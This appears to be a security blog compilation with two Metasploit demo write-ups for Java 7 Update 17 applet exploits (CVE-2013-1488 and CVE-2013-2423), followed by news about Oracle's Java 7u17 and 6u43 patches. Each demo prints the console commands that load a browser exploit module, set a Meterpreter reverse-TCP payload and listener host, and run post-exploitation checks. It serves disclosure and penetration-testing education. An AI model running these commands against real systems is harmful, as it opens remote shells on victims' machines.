CVE-2013-1488 Oracle Java Applet Driver Manager Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered, exploited by James Forshaw during Pwn2Own 2013
Vulnerability fixed by Oracle the 2013-04-16
Details on the vulnerability provided by James Forshaw the 2013-04-19
Metasploit PoC provided the 2013-06-07

PoC provided by :

James Forshaw
juan vazquez

Reference(s) :

CVE-2013-1488
OSVDB-91472
BID-58504
ZDI-13-076
Oracle Java SE Critical Patch Update Advisory – April 2013
Context Information Security Pwn2Own blog post

Affected version(s) :

JSE 7 Update 17 and before

Tested on Windows XP Pro with :

JSE 7 Update 17

Description :

This module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java Web Start can be launched automatically through the ActiveX control. Otherwise, the applet is launched without click-to-play bypass.

Commands :

use exploit/multi/browser/java_jre17_driver_manager
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

CVE-2013-2423 – Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Jeroen Frijters
Vulnerability corrected in April CPU the 2013-04-16
Vulnerability publicly disclosed by Jeroen Frijters the 2013-04-17
Metasploit PoC provided the 2013-04-20

PoC provided by :

Jeroen Frijters
juan vazquez

Reference(s) :

Oracle Java April 2013 CPU
CVE-2013-2423
OSVDB-92348
BID-59162

Affected version(s) :

JDK and JRE 7 Update 17 and earlier

Tested on Windows XP Pro SP3 with :

JDK and JRE 7 Update 17

Description :

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit doesn’t bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.

Commands :

use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

Oracle update to Java 7 Update 17 and to Java 6 Update 43, but…

Oracle, stressed by the new Java 0day discovered exploited in the wild, seem to have release new updates for Java 7, Java 6 and Java 5. Java 7 is updated to version 1.7.0_17, Java 6 is updated to version 1.6.0_43 and Java 5 is updated to version 1.5.0_41.

java7u17

These update are pushed an “Oracle Security Alert for CVE-2013-1493” who fix CVE-2013-1493 vulnerability related to the Java 0day, but also another vulnerability, aka CVE-2013-0809, affecting Java running in web browsers. Both vulnerabilities have a CVSS base score of 10.0 and are remotely exploitable without authentication.

Vulnerabilities are credited to an anonymous Reporter of TippingPoint’s Zero Day Initiative, axtaxt via Tipping Point’s Zero Day Initiative, Darien Kindlund of FireEye, Vitaliy Toropov via iDefense and to Vitaliy Toropov via TippingPoint. As you may remember, CVE-2013-1493 was discovered exploited in the wild by FireEye, but it seem that this vulnerability was also previously discovered by a security researcher working with 0day brokers. It is not the first time that we see 0days exploited in the wild, previously reported to 0day brokers !

Also, Security Explorations, a security firm responsible for identifying most of the latest Java vulnerabilities, is not credited for any of the patched vulnerabilities. So they are still bunch off reported vulnerabilities in Java.

Last but not least, Security Explorations has report, today, five new security issues for Java 7 who can be used to gain a complete Java security sandbox bypass in the environmentof Java SE 7 Update 15.